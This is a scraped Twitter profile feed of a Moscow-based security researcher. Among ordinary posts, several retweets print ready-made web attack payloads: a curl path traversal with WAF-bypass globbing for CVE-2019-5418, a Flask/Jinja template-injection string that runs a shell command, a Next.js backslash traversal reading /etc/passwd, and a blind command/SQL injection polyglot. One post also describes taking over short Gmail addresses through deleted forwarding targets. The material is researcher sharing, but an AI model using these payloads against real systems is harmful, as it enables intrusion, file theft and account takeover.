Kirill Firsov

@k_firsov

Security researcher, Web developer

Moscow
Joined April 2011

Tweets

You blocked @k_firsov

Are you sure you want to view these Tweets? Viewing Tweets won't unblock @k_firsov

  1. Retweeted
    29 Mar 2019

    Vulncode-DB – A vulnerable code database

    Undo
  2. Retweeted
    28 Mar 2019

    Want to bypass WAF when exploiting CVE-2019-5418 ? curl -H 'Accept: ../../../../../../e*c/p*s*d{{' http://server/...

    Show this thread
    Undo
  3. Retweeted
    28 Mar 2019

    Wow, this is a great payload for sites using Flask/Jinja: {{config.items()[4][1].__class__.__mro__[2].__subclasses__()[229]([\"touch /tmp/test\"], shell=True) }} Simple pythonic ! Easiest Server-Side Template Injection.

    Undo
  4. 5 Mar 2019

    «Best price guarantee» in really works! Thank you

    Undo
  5. Retweeted

    React Framework - Arbitrary File Reading in Next.js < 2.4.1 NodeJS server transforms backslashes into forward slashes, so we can bypass nginx validation. GET /_next\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1

    Undo
  6. Retweeted
    25 Feb 2019

    Today i made for fun a that combines blind command injection and blind sql injection ( mysql ) in one payload: /*$(sleep 5)`sleep 5``*/sleep(5)#'/*$(sleep 5)`sleep 5` #*/||sleep(5)||'"||sleep(5)||"` is 5 seconds delay and 10 seconds

    Show this thread
    Undo
  7. Retweeted

    Awesome Burp Extensions:- Scanners Custom Features Beautifiers and Decoders Cloud Security Scripting OAuth and SSO Information Gathering Web Application Firewall Evasion Logging and Notes Payload Generators and Fuzzers AND MOORE.

    Undo
  8. 24 Feb 2019

    Hey . I have no response for a one week for your «Best price guarantee» service.

    Undo
  9. Retweeted
    16 Feb 2019

    For Pentesters and CTF players, here’s a list of useful payloads and bypasses, covering various WebApp attacks. There are a lot of similar GitHub repos out there. What’s your personal favorite?

    Undo
  10. Retweeted
    13 Feb 2019
    Undo
  11. Retweeted
    11 Feb 2019

    How to bypass Instagram SSL Pinning on Android (v78)

    Undo
  12. 14 Mar 2018

    You can check any email address for mail forwarding at , add some note and add 123@gmail.com to it.

    Show this thread
    Undo
  13. 14 Mar 2018

    If you want to get the shortest gmail account like 123@gmail.com you should find where it forwards and register this address if it was deleted. As example 123@gmail.com forwards to helenamaria.braz@hotmail.com which has been removed as unused from hotmail.

    Show this thread
    Undo
  14. Retweeted
    11 Nov 2017

    Publishing my another writeup . How I could steal bitcoin wallet backups from

    Undo
  15. Retweeted
    30 Oct 2017
    Undo
  16. Retweeted
    27 Oct 2017
    Undo
  17. Retweeted

    I just published “The best Burp plugin I’ve ever seen”

    Undo
  18. Retweeted
    2 Oct 2017
    Undo
  19. Retweeted
    11 Sep 2017

    Another router/IoT that got pwned, this time the Dlink 850L: XSS, auth bypass, RCE, default private keys, etc. 😩

    Undo
  20. 28 Jun 2017

    Solved the final challenge on 4th place, almost a winner, almost a millionaire

    Undo

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

    You may also like

    ·